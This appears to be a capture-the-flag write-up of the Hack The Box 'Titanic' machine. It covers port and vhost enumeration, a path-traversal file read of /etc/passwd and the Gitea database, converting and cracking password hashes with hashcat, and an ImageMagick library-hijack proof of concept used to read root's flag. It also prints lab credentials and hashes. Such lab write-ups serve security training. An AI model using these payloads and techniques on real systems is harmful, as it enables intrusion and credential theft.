HTB Titanic - π§
Enumeration
There is feature to book trip, which then makes the date downloaded in json file. http://titanic.htb/download?ticket=08de371a-8c0c-4215-a977-b53459f4bb41.json
nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
βββ(d31tyγΏkali)-[~/Downloads/HTB/titanic]
ββ$ nmap -sC -sV -A -T4 -Pn 10.10.11.55
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 19:02 IST
Nmap scan report for titanic.htb (10.10.11.55)
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
|_ 256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Titanic - Book Your Ship Trip
| http-server-header:
| Apache/2.4.52 (Ubuntu)
|_ Werkzeug/3.0.3 Python/3.10.12
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/19%OT=22%CT=1%CU=31573%PV=Y%DS=2%DC=T%G=Y%TM=67B5
OS:DD8A%P=aarch64-unknown-linux-gnu)SEQ(CI=Z)SEQ(SP=106%GCD=1%ISR=108%TI=Z%
OS:CI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=F7%GC
OS:D=2%ISR=108%TI=Z%CI=Z%TS=A)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT1
OS:1NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE
OS:88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=
OS:)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUC
OS:K=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 253.49 ms 10.10.14.1
2 253.34 ms titanic.htb (10.10.11.55)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.04 seconds
Simple LFI worked: http://titanic.htb/download?ticket=../../../etc/passwd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
2 users: root, developer
Dirsearch: didnβt get anything gobuster vhost
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
ββ(d31tyγΏkali)-[~/Downloads/HTB/titanic]
ββ$ gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u titanic.htb -t 50 --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://titanic.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.titanic.htb Status: 200 [Size: 13982]
In the dev.titanic.htb I found the version of gitea: Version: 1.22.1
![[Screenshot 2025-02-19 at 19.35.41.png]]
Ran dirsearch again:)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
β(d31tyγΏkali)-[~/Downloads/HTB/titanic]
ββ$ dirsearch -u http://dev.titanic.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/d31ty/Downloads/HTB/titanic/reports/http_dev.titanic.htb/_25-02-19_19-37-15.txt
Target: http://dev.titanic.htb/
[19:37:15] Starting:
[19:37:33] 404 - 0B - /.well-known/acme-challenge
[19:37:33] 404 - 0B - /.well-known/apple-app-site-association
[19:37:33] 404 - 0B - /.well-known/apple-developer-merchant-domain-association
[19:37:33] 404 - 0B - /.well-known/acme-challenge/dtfy
[19:37:33] 404 - 0B - /.well-known/ashrae
[19:37:33] 404 - 0B - /.well-known/assetlinks.json
[19:37:33] 404 - 0B - /.well-known/browserid
[19:37:33] 404 - 0B - /.well-known/caldav
[19:37:33] 404 - 0B - /.well-known/dnt
[19:37:33] 404 - 0B - /.well-known/csvm
[19:37:33] 404 - 0B - /.well-known/dnt-policy.txt
[19:37:33] 404 - 0B - /.well-known/ni
[19:37:33] 404 - 0B - /.well-known/est
[19:37:33] 404 - 0B - /.well-known/jwks
[19:37:33] 404 - 0B - /.well-known/carddav
[19:37:33] 404 - 0B - /.well-known/host-meta
[19:37:33] 404 - 0B - /.well-known/core
[19:37:33] 404 - 0B - /.well-known/hoba
[19:37:33] 404 - 0B - /.well-known/host-meta.json
[19:37:33] 404 - 0B - /.well-known/jwks.json
[19:37:33] 404 - 0B - /.well-known/stun-key
[19:37:33] 404 - 0B - /.well-known/time
[19:37:33] 404 - 0B - /.well-known/void
[19:37:33] 404 - 0B - /.well-known/genid
[19:37:33] 404 - 10B - /.well-known/webfinger
[19:37:33] 404 - 0B - /.well-known/keybase.txt
[19:37:33] 200 - 1KB - /.well-known/openid-configuration
[19:37:33] 404 - 0B - /.well-known/repute-template
[19:37:33] 404 - 0B - /.well-known/openorg
[19:37:33] 404 - 0B - /.well-known/posh
[19:37:33] 404 - 0B - /.well-known/reload-config
[19:37:33] 200 - 206B - /.well-known/security.txt
[19:37:33] 404 - 0B - /.well-known/timezone
[19:37:47] 303 - 38B - /admin -> /user/login
[19:37:48] 303 - 38B - /admin/ -> /user/login
[19:38:04] 200 - 20KB - /administrator
[19:38:04] 200 - 20KB - /administrator/
[19:38:08] 404 - 19B - /api/v1/swagger.yaml
[19:38:08] 404 - 19B - /api/v1/swagger.json
[19:38:08] 404 - 19B - /api/v1/
[19:38:08] 200 - 433B - /api/swagger
[19:38:08] 404 - 19B - /api/v1
[19:38:10] 404 - 0B - /assets/fckeditor
[19:38:10] 404 - 0B - /assets/file
[19:38:10] 404 - 0B - /assets/js/fckeditor
[19:38:10] 404 - 0B - /assets/pubspec.yaml
[19:38:10] 404 - 0B - /assets/npm-debug.log
[19:38:26] 200 - 7KB - /developer
[19:38:30] 303 - 41B - /explore -> /explore/repos
[19:38:31] 200 - 6KB - /explore/repos
[19:38:31] 301 - 58B - /favicon.ico -> /assets/img/favicon.png
[19:38:40] 303 - 38B - /issues -> /user/login
[19:39:04] 404 - 19B - /robots.txt
[19:39:09] 200 - 170B - /sitemap.xml
[19:39:21] 200 - 11KB - /user/login/
[19:39:22] 401 - 50B - /v2/_catalog
[19:39:22] 401 - 50B - /v2
[19:39:22] 401 - 50B - /v2/
[19:39:22] 404 - 19B - /v2/api-docs
[19:39:22] 404 - 19B - /v2/keys/?recursive=true
![[Screenshot 2025-02-19 at 19.40.47.png]]
We got info to check the localhost once we get a foothold. ![[Screenshot 2025-02-19 at 19.41.20.png]]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
version: '3'
services:
gitea:
image: gitea/gitea
container_name: gitea
ports:
- "127.0.0.1:3000:3000"
- "127.0.0.1:2222:22" # Optional for SSH access
volumes:
- /home/developer/gitea/data:/data # Replace with your path
environment:
- USER_UID=1000
- USER_GID=1000
restart: always
In the version history of this file, I found this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
version: '3.8'
services:
mysql:
image: mysql:8.0
container_name: mysql
ports:
- "127.0.0.1:3306:3306"
environment:
MYSQL_ROOT_PASSWORD: 'MySQLP@$$w0rd!'
MYSQL_DATABASE: tickets
MYSQL_USER: sql_svc
MYSQL_PASSWORD: sql_password
restart: always
In the flask app folder found user info:
1
{"name": "Jack Dawson", "email": "jack.dawson@titanic.htb", "phone": "555-123-4567", "date": "2024-08-23", "cabin": "Standard"}
1
{"name": "Rose DeWitt Bukater", "email": "rose.bukater@titanic.htb", "phone": "643-999-021", "date": "2024-08-22", "cabin": "Suite"}
Thought I can use that LFI to get this file. ![[Screenshot 2025-02-19 at 19.53.35.png]] /home/developer/gitea/data/gitea/conf/app.ini ![[Screenshot 2025-02-19 at 19.55.25.png]]
From this letβs get the db file as well! /home/developer/gitea/data/gitea/gitea.db
![[Screenshot 2025-02-19 at 19.59.33.png]]
| User | Password | | ββββ- | βββββββββββββββββββββββββββββββββ- | | administrator | cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136 | | developer | e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56 | | bread | 58b9ab9a67551c76f0b584691ced5a50eb9d99f8d0875ec0f5984fceb0cf06dbc22024fbe0acae7089606629034e33ee037c | | simoss | b36246d41a4f7b5665bd0f4285f595a6c3fb54b781d6ebdabd7ab4139d914c44c598232d585f42e870a9d47073ea247e1e0d | All the passwords are in this hash: pbkdf2$50000$50
Whoaaaaa! now we need to crack the password hash. As you see the email column, it makes very clear we should be interested in the admin and developer user.
Letβs stick developer user!
Then I need to find a way to convert the password(hashed and salted) to proper hash format so that hashcat can dehash it. I found this article useful: HTB Complied
Command: sqlite3 gitea.db "select passwd,salt,name from user" | while read data; do digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $data | cut -d'|' -f 3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hashes
1
2
3
4
5
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=
bread:sha256:50000:WQbGrCApRPAbWhPfhMuYqw==:WLmrmmdVHHbwtYRpHO1aUOudmfjQh17A9ZhPzrDPBtvCICT74KyucIlgZikDTjPuA3w=
simoss:sha256:50000:S9815lNdl9JIU5ioGWXhVA==:s2JG1BpPe1ZlvQ9ChfWVpsP7VLeB1uvavXq0E52RTETFmCMtWF9C6HCp1HBz6iR+Hg0=
Now its time to crack.
1
2
3
4
ββ(d31tyγΏkali)-[~/Downloads/HTB/titanic]
ββ$ hashcat gitea.hashes /usr/share/wordlists/rockyou.txt --user
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528
![[Screenshot 2025-02-19 at 20.22.55.png]]
Logged in as developer: User flag: 645be18c59074c9c167f180e687e8d85
Privilege Escalation
1
2
3
ββββββββββββ£ PATH
β https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses
/home/developer/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
![[Screenshot 2025-02-19 at 21.07.51.png]]
Couldnβt exploit furtherβ¦
1
2
3
4
5
Version: mongo Not Found
mongod Not Found
-rw-r--r-- 1 root root 2279 Nov 23 2020 /etc/fail2ban/filter.d/mongodb-auth.conf
Couldnβt exploit furtherβ¦
Also the localhost:3000 is nothing but dev.titanic.htb => so no use on that as wellβ¦
1
2
3
4
5
6
7
8
9
10
11
12
ββββββββββββ£ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root developer 7568 Aug 1 2024 /opt/app/templates/index.html
-rw-r----- 1 root developer 209762 Feb 3 17:13 /opt/app/static/assets/images/favicon.ico
-rw-r----- 1 root developer 280817 Feb 3 17:13 /opt/app/static/assets/images/luxury-cabins.jpg
-rw-r----- 1 root developer 291864 Feb 3 17:13 /opt/app/static/assets/images/entertainment.jpg
-rw-r----- 1 root developer 232842 Feb 3 17:13 /opt/app/static/assets/images/home.jpg
-rw-r----- 1 root developer 280854 Feb 3 17:13 /opt/app/static/assets/images/exquisite-dining.jpg
-rw-r----- 1 root developer 0 Feb 19 15:38 /opt/app/static/assets/images/metadata.log
-rw-r----- 1 root developer 567 Aug 1 2024 /opt/app/static/styles.css
-rwxr-x--- 1 root developer 1598 Aug 2 2024 /opt/app/app.py
-rw-r----- 1 root developer 33 Feb 19 14:43 /home/developer/user.txt
This looked interesting.. ![[Screenshot 2025-02-19 at 21.17.40.png]]
This command also gets you here: find / -writable -type d 2>/dev/null
![[Screenshot 2025-02-19 at 21.19.05.png]] On my way I found this also..I came back as there is no interesting stuff in /opt/app/static/assets/images
![[Screenshot 2025-02-19 at 21.20.13.png]]
/usr/bin/magick --version ![[Screenshot 2025-02-19 at 21.20.34.png]] ImageMagick 7.1.1-35 - Found CVE-2024-41817 This official poc link
1
2
3
4
5
6
7
8
9
10
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("id");
exit(0);
}
EOF
This can be executed in the images folder.
Here to get root privilege, I could have read the /etc/shadow and password or find .ssh/id_rsa file of root and gain, but simply I thought reading the root flag will do :)
But we can do this:
1
2
3
4
5
6
7
8
9
10
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("cp /root/root.txt root_d31ty.txt; chmod 754 root_d31ty.txt");
exit(0);
}
EOF
After some time we get the root flag. ![[Screenshot 2025-02-19 at 21.29.21.png]]
Root flag: c323bf5d42df8181c21b4f80fb4f4feb